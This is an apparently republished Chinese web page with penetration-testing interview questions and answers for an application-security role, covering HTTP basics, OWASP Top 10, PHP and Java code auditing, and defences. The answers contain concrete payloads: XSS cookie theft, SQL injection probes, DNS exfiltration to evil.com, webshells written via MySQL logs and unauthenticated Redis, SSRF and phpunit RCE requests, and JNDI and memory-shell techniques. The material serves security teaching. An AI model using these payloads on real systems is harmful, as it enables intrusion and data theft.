2025年滲透測試面試題總結-攻防研究員(應用安全)(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

?攻防研究員(應用安全)

一、基礎部分

1. HTTP狀態碼對比

2. HTTP請求方法核心作用

3. 網絡分層協議速查表

二、OWASP TOP 10攻防要點

1. XSS代碼執行原理

2. XSS常用標簽與Payload

3. HttpOnly防御機制

4. SQL注入快速檢測

5. 無回顯注入解決方案

6. MySQL延時注入替代技術

7. DNSLog原理圖解

8. 單引號攔截繞過技術

9. MySQL寫Shell高階方法

10. Redis未授權寫Shell

11. SSRF利用鏈與高危協議

PHP安全審計核心要點

1. 審計流程

2. 命令執行函數

3. 文件上傳函數

4. 代碼執行函數

5. vendor目錄風險

6. phpunit漏洞利用

7. 無文件Shell實現

Java安全審計核心要點

1. 通用漏洞組合利用

2. 命令執行函數/包

3. 主流框架漏洞

4. 審計流程與專長

5. Tomcat回顯技術

6. 內存馬實現方式

防御關鍵點總結


?攻防研究員(應用安全)

# 基礎
1. http狀態碼,502,503,501
2. http請求方式及各自作用
3. 計算機網絡的分層及分別有哪些協議# owasp top 10
1. xss如何執行代碼
2. xss常用哪些標簽
3. http only
4. 怎樣判斷是否存在注入
5. sql注入無回顯怎么辦
6. 延時注入除了sleep的其他姿勢(mysql)
7. dnslog的實現原理
8. sql注入,單引號被攔截,如何繞過
9. sql注入,寫shell的語句,除了into outfile還有什么mysql的特性可以getshell
10.redis的利用,如何shell,相關命令
11.ssrf的原理即后利用,怎么執行命令,常搭配使用的協議# PHP安全相關
1. 審計流程
2. 命令執行函數
3. 文件上傳函數
4. 代碼執行函數
5. vender目錄
6. phpunit
7. php可以構造無文件shell嗎# Java安全相關
1. 挖過的通用洞,你會怎么利用(組合)
2. 命令的函數或包
3. java哪些框架,審過哪些框架,它們常出現的問題是什么
4. 審計流程,你一般關注哪些洞,或擅長挖哪種類型
5. tomcat做回顯
6. 內存馬的實現# 其他
- 寫poc/exp的經歷和心得
- 復現的一些漏洞
- Linux 提權的姿勢
- Linux下有哪些文件進行滲透時比較關注的,及文件權限問題
- dirty cow 的時間及其修復版本(哪年后就沒法用了)
- 你覺得什么是你自己比較擅長的而我沒有問到的

一、基礎部分

1. HTTP狀態碼對比
狀態碼含義觸發場景
502Bad Gateway網關服務器收到上游無效響應
503Service Unavailable服務過載或維護中(臨時不可用)
501Not Implemented服務器不支持請求方法(如PUT)

補充:502需檢查反向代理配置,503常伴隨Retry-After頭部。

2. HTTP請求方法核心作用
方法主要功能關鍵特性
GET獲取資源安全、冪等、可緩存
POST提交數據(創建/更新資源)非冪等、請求體傳參
PUT替換整個資源冪等、需完整資源
DELETE刪除指定資源冪等
PATCH局部更新資源非冪等

注:HEAD獲取響應頭,OPTIONS查詢服務器支持的方法。

3. 網絡分層協議速查表
分層核心協議
應用層HTTP/HTTPS, DNS, FTP, SMTP
傳輸層TCP(可靠傳輸), UDP(低延遲)
網絡層IP, ICMP(ping), ARP(地址解析)
數據鏈路層Ethernet, PPP, MAC地址尋址
物理層光纖、雙絞線(定義電氣/物理特性)

二、OWASP TOP 10攻防要點

1. XSS代碼執行原理

用戶輸入 → 未過濾嵌入HTML → 瀏覽器解析執行JS代碼

 

html

復制

<!-- 反射型XSS示例 --> http://site.com?search=<script>**alert(document.cookie)**</script>

2. XSS常用標簽與Payload
 

html

復制

<img src=x **onerror=alert(1)**> <!-- 事件觸發 --> <svg **onload=alert(1)**> <!-- 矢量圖形利用 --> <a href=**javascript:alert(1)**>XSS</a> <!-- JS偽協議 --> <iframe **src=javascript:alert(1)**> <!-- iframe嵌套 -->

3. HttpOnly防御機制
  • 作用:設置Set-Cookie: sessionID=xxx; **HttpOnly**
  • 效果:阻止JavaScript讀取Cookie,緩解會話劫持
4. SQL注入快速檢測
類型檢測Payload預期結果
數字型id=1 **AND 1=1**id=1 **AND 1=2**頁面內容變化
字符型id=' **'**數據庫報錯
布爾盲注id=1' **AND SLEEP(5)**--響應延遲5秒
5. 無回顯注入解決方案
  • DNS外帶數據(需出網):
     

    sql

    復制

    SELECT LOAD_FILE(CONCAT('\\\\',(**SELECT password**),'.evil.com\\a'))

  • 布爾盲注:二分法逐字符判斷 SUBSTRING(password,1,1)='a'
6. MySQL延時注入替代技術
 

sql

復制

SELECT **BENCHMARK(10000000,SHA1('test'))**; /* CPU計算延時 */ SELECT **GET_LOCK('inject',5)**; /* 數據庫鎖競爭 */

7. DNSLog原理圖解
 

mermaid

復制

graph LR A[目標服務器] -- 發起DNS查詢 --> B(**惡意域名: data.attacker.com**) B --> C[DNS服務器] C --> D[攻擊者查看日志] D --> E(獲取“data”內容)

8. 單引號攔截繞過技術
  • 編碼繞過CHAR(39) 代替 '(ASCII 39=單引號)
  • 寬字節注入%bf%27 → GBK編碼吞并轉義符\
  • 數字型注入:直接使用 id=1 避免引號
9. MySQL寫Shell高階方法
 

sql

復制

SET GLOBAL **general_log = 'ON'**; SET GLOBAL **general_log_file = '/var/www/shell.php'**; SELECT '<?php **system($_GET[cmd])**; ?>'; /* 日志寫入Webshell */

10. Redis未授權寫Shell
 

bash

復制

CONFIG SET **dir /var/www/html** # 設置Web目錄 SET payload "<?php **system($_GET['cmd'])**;?>" CONFIG SET **dbfilename shell.php** # 保存為PHP SAVE # 持久化到磁盤

11. SSRF利用鏈與高危協議
協議利用場景命令執行示例
file://讀取本地文件file:///etc/passwd
gopher://發送任意TCP請求構造Redis協議執行FLUSHALL
dict://探測內網端口dict://127.0.0.1:6379/info

PHP安全審計核心要點

1. 審計流程
mermaidgraph TD A[信息收集] --> B[入口點定位] B --> C{敏感函數追蹤} C --> D[漏洞鏈構造] D --> E[PoC驗證]
  • 信息收集composer.json 依賴分析、框架版本比對(如Laravel CVE-2021-3129 RCE)
  • 入口點$_GET/$_POSTfile_get_contents('php://input')$_COOKIE
  • 敏感函數追蹤:全局搜索eval/system/unserialize
  • 漏洞鏈:如文件上傳+路徑穿越→本地文件包含→RCE
2. 命令執行函數
高危函數利用場景
system()直接執行系統命令
shell_exec()無回顯命令執行(需輸出劫持)
popen()管道形式執行命令
proc_open()多進程控制(可交互式Shell)
3. 文件上傳函數
  • move_uploaded_file()
    繞過方案:%00截斷(PHP<5.3)、/.目錄穿越(Linux)
  • file_put_contents()
    風險:<?php標簽直接寫入Web目錄 → Webshell
4. 代碼執行函數
函數觸發方式
eval()直接執行字符串代碼
assert()斷言語句執行PHP代碼
preg_replace(/e)修飾符e導致代碼執行
call_user_func()回調函數執行系統命令
5. vendor目錄風險
  • 依賴包漏洞:如phpmailer/phpmailer < 6.5.3 (CVE-2021-3603 RCE)
  • 利用方式
    1. 查找已知漏洞組件版本(composer.lock
    2. 觸發漏洞鏈(如反序列化+POP鏈)
6. phpunit漏洞利用
  • 未授權RCE:暴露/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Payload
    httpPOST /eval-stdin.php HTTP/1.1 Body: <?php system("id"); ?>
7. 無文件Shell實現
技術原理
內存駐留通過php-fpm未授權訪問執行代碼
反序列化鏈利用Monolog/Guzzle庫的__destruct觸發
OpCache覆蓋篡改緩存文件(需條件:文件可寫+已知路徑)

Java安全審計核心要點

1. 通用漏洞組合利用
mermaidgraph LR A[Fastjson反序列化] --> B[JNDI注入] B --> C[LDAP惡意類加載] C --> D[遠程代碼執行]
  • 經典組合
    • Shiro RememberMe + 硬編碼密鑰 → AES反序列化RCE
    • Log4j2 + ${jndi:ldap://} → 遠程類加載
2. 命令執行函數/包
類/方法所屬包
Runtime.getRuntime().exec()java.lang
ProcessBuilder.start()java.lang
GroovyShell.evaluate()org.codehaus.groovy
3. 主流框架漏洞
框架常見漏洞類型案例
SpringSpEL表達式注入CVE-2022-22963(Cloud RCE)
Struts2OGNL表達式執行S2-045(RCE via Content-Type)
Shiro權限繞過/反序列化CVE-2020-1957(路徑繞過)
4. 審計流程與專長
  • 核心關注點
    1. 反序列化入口(readObject()、JSON/XML解析)
    2. 表達式注入(OGNL、SpEL、EL)
    3. 權限校驗缺失(Shiro注解繞過)
  • 專長方向
    • Java反序列化鏈:構造CC鏈、Tomcat鏈攻擊
    • 內存馬注入:無文件持久化攻擊
5. Tomcat回顯技術
  • 寫入響應流
    javaWebappClassLoader loader = (WebappClassLoader) Thread.currentThread().getContextClassLoader(); ServletContext context = loader.getServletContext(); HttpServletResponse response = (HttpServletResponse) context.getResponse(); response.getWriter().write(" 命令結果");
6. 內存馬實現方式
類型注入點持久化方式
Servlet型addServlet()動態注冊惡意Servlet
Filter型addFilter()攔截所有請求
Agent型Instrumentation字節碼修改(無文件)

防御關鍵點總結表

風險類型PHP防御方案Java防御方案
命令執行disable_functions禁用高危函數SecurityManager限制執行權限
文件上傳MIME檢測+隨機文件名文件頭校驗+獨立存儲域
反序列化避免unserialize用戶輸入使用SafeObjectInputStream
無文件攻擊禁用php-fpm未授權訪問JVM參數禁止遠程類加載

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/84808.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/84808.shtml
英文地址,請注明出處:http://en.pswp.cn/web/84808.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

SpringBoot新聞項目學習day3--后臺權限的增刪改查以及權限管理分配

新增管理員修改管理員刪除管理員登錄 新增管理員 1.點擊新增按鈕打開一個對話框 2.確定新增對話框要顯示哪些內容 3.提交 4.后端處理、保存 5.響應前端 vue代碼 <template><!-- 新增代碼內容是比較多的,建議抽取出來,定義到一個獨立的vue文件中在列表組件中導入…

算法導論第二十五章 深度學習的倫理與社會影響

第二十五章 深度學習的倫理與社會影響 技術的光芒不應掩蓋倫理的陰影 隨著深度學習技術在各領域的廣泛應用&#xff0c;其引發的倫理和社會問題日益凸顯。本章將深入探討這些挑戰&#xff0c;并提供技術解決方案和最佳實踐&#xff0c;引導讀者構建負責任的人工智能系統。 25.…

Linux中ansible模塊補充和playbook講解

一、模塊使用 1.1 Yum模塊 功能&#xff1a;管理軟件包&#xff0c;只支持RHEL&#xff0c;CentOS&#xff0c;fedora&#xff0c;不支持Ubuntu其它版本 參數說明name要操作的軟件包名稱&#xff0c;支持通配符&#xff08;如 httpd, nginx*&#xff09;&#xff0c;也可以是…

唐代大模型:智能重構下的盛世文明圖譜

引言&#xff1a;當長安城遇見深度學習 一件唐代鎏金舞馬銜杯銀壺的虛擬復原品正通過全息投影技術演繹盛唐樂舞。這個跨越時空的場景&#xff0c;恰似唐代大模型技術的隱喻——以人工智能為紐帶&#xff0c;連接起長安城的盛世氣象與數字時代的文明重構。作為人工智能與歷史學…

國產ARM/RISCV與OpenHarmony物聯網項目(三)網關設備控制

一、設備控制界面與功能設計 程序界面運行與設計效果如下: 設備控制相關程序調用關系圖如下&#xff1a; 其中device_control.html程序為網頁界面顯示程序&#xff0c;led_alarm.cgi程序為光線數據的報警超限數據設置與管理&#xff0c;led_control.cgi程序功能為對Led燈的開…

微信小程序反編譯實戰教程

在實際滲透測試或安全分析中&#xff0c;經常會遇到微信小程序中的簽名加密&#xff08;sign&#xff09;機制&#xff0c;這些機制大多具備防重放、防篡改的特性&#xff0c;導致我們在抓包時難以直接復現請求。 &#x1f50d; 另一方面&#xff0c;一些小程序的代碼中往往會…

【NLP入門系列三】NLP文本嵌入(以Embedding和EmbeddingBag為例)

&#x1f368; 本文為&#x1f517;365天深度學習訓練營 中的學習記錄博客&#x1f356; 原作者&#xff1a;K同學啊 博主簡介&#xff1a;努力學習的22級本科生一枚 &#x1f31f;?&#xff1b;探索AI算法&#xff0c;C&#xff0c;go語言的世界&#xff1b;在迷茫中尋找光芒…

文心一言(ERNIE Bot):百度打造的知識增強大語言模型

1. 產品概述 文心一言&#xff08;ERNIE Bot&#xff09;是百度自主研發的知識增強大語言模型&#xff0c;于2023年3月16日正式發布&#xff0c;對標OpenAI的ChatGPT&#xff0c;具備文本生成、多模態交互、邏輯推理、中文理解等能力。該模型基于百度的飛槳深度學習平臺和文心…

Java-49 深入淺出 Tomcat 手寫 Tomcat 實現【02】HttpServlet Request RequestProcessor

點一下關注吧&#xff01;&#xff01;&#xff01;非常感謝&#xff01;&#xff01;持續更新&#xff01;&#xff01;&#xff01; &#x1f680; AI篇持續更新中&#xff01;&#xff08;長期更新&#xff09; 目前2025年06月13日更新到&#xff1a; AI煉丹日志-28 - Aud…

在VB.net中,文本插入的幾個自定義函數

一、如果你是高手&#xff0c;一定“識貨”&#xff0c;分享給你 二、可應用于文本插入的幾種方式&#xff1a;6種 三、需要用到以下的幾個函數&#xff1a; 上代碼&#xff1a; Module TextModule <summary> 在指定位置插入文本 </summary> <p…

QC -io 服務器排查報錯方式/報錯: Failed to convert string to integer of varId variable!“

進斷點控制臺有報錯之后&#xff0c;復制報錯信息到 頭部菜單欄 1.編輯 -> 2.Find/Replace ->3.Advanced Find ->4. Project“xxxxx” 能找到問題點 再分析定位 在排查報錯時候&#xff0c;進入了這個報錯&#xff0c;msgInfo "MyTcpRedis: Failed to conver…

c++中auto與decltype使用

在 C11及后續版本中&#xff0c;關鍵字auto和decltype都是用于類型推導的&#xff0c;但它們的使用場景和行為有所不同。 1. auto 關鍵字 作用 auto 用于自動推導變量的類型&#xff0c;由編譯器根據初始化表達式來確定。 常見用法 // 基本用法 auto x 42; // int…

LabVIEW機器視覺零件檢測

基于LabVIEW 圖形化編程平臺與機器視覺技術&#xff0c;構建集圖像采集、處理、尺寸計算與合格性分析于一體的自動化檢測方案。通過模塊化硬件架構與自適應算法設計&#xff0c;實現對機械零件多維度尺寸的非接觸式高精度測量&#xff0c;相比人工檢測效率提升 12 倍&#xff0…

大數據治理域——實時數據開發

摘要 本文深入探討了大數據治理域中的實時數據開發&#xff0c;重點介紹了流式數據處理的核心價值、特點、技術挑戰、典型能力和應用場景。同時&#xff0c;詳細闡述了流式技術架構&#xff0c;包括數據采集、處理、存儲和服務等環節&#xff0c;并針對大促場景提出了相應的技…

Halcon/C# 圖像窗口、讀取圖片及仿射變換

一、Halcon 清理窗口 清除圖像窗口的顯示。 dev_clear_window() 二、Halcon 讀取圖片 (一) 讀取一張圖片 read_image (Image, printer_chip/printer_chip_01)Image&#xff1a;&#xff08;輸出參數&#xff09;讀取到的圖片變量名 第二個參數&#xff1a;圖片路徑&#xf…

Nginx 反向代理服務和安裝docker-compose

Nginx 反向代理服務和安裝docker-compose Nginx Proxy Manager 他是一個可視化的nginx的反向代理神器&#xff0c;動動手指輕松的配置Nginx&#xff0c;我們可以通過一些網頁&#xff0c;即可完成網站的代理配置&#xff0c;無需在動手安裝Nginx&#xff1b; dockoer-compose部…

FPGA基礎 -- Verilog 鎖存器簡介

由淺入深地講解 Verilog 中的鎖存器&#xff08;Latch&#xff09;**&#xff0c;包括&#xff1a; 什么是鎖存器&#xff08;定義與作用&#xff09;鎖存器的分類&#xff08;透明鎖存器 vs 邊沿觸發器&#xff09;Verilog 中鎖存器的建模方式鎖存器與觸發器的區別鎖存器的時…

Eclipse Memory Analyzer (MAT) 相關配置調整

一、JDK版本過低提示 已安裝高于 jdk 17 的版本依舊提示 jdk 版本過低&#xff0c;打開MAT的安裝目錄&#xff0c;在配置文件 MemoryAnalyzer.ini 中添加配置指向JDK即可。新增兩行配置&#xff1a; -vm D:/jdk_21.0.7/bin/javaw.exe //jdk安裝路徑 bin 目錄下的javaw.exe二…

機器學習常用評估指標

機器學習常用評估指標 機器學習的評價指標有精度、精確率、召回率、P-R曲線、F1 值、TPR、FPR、ROC等指標&#xff0c;還有在生物領域常用的敏感性、特異性等指標。 基礎 在分類任務中&#xff0c;各指標的計算基礎都來自于對正負樣本的分類結果&#xff0c;用混淆矩陣表示&…

視頻相似度檢測算法(帶課設報告)

摘 要 本文提出了一種基于關鍵幀特征提取的視頻相似度檢測方法&#xff0c;通過融合自適應采樣與特征降維技術實現高效準確的視頻內容比對。系統采用三階段處理流程&#xff1a;首先對輸入視頻進行自適應關鍵幀采樣&#xff0c;通過均勻間隔算法提取固定數量&#xff08;默…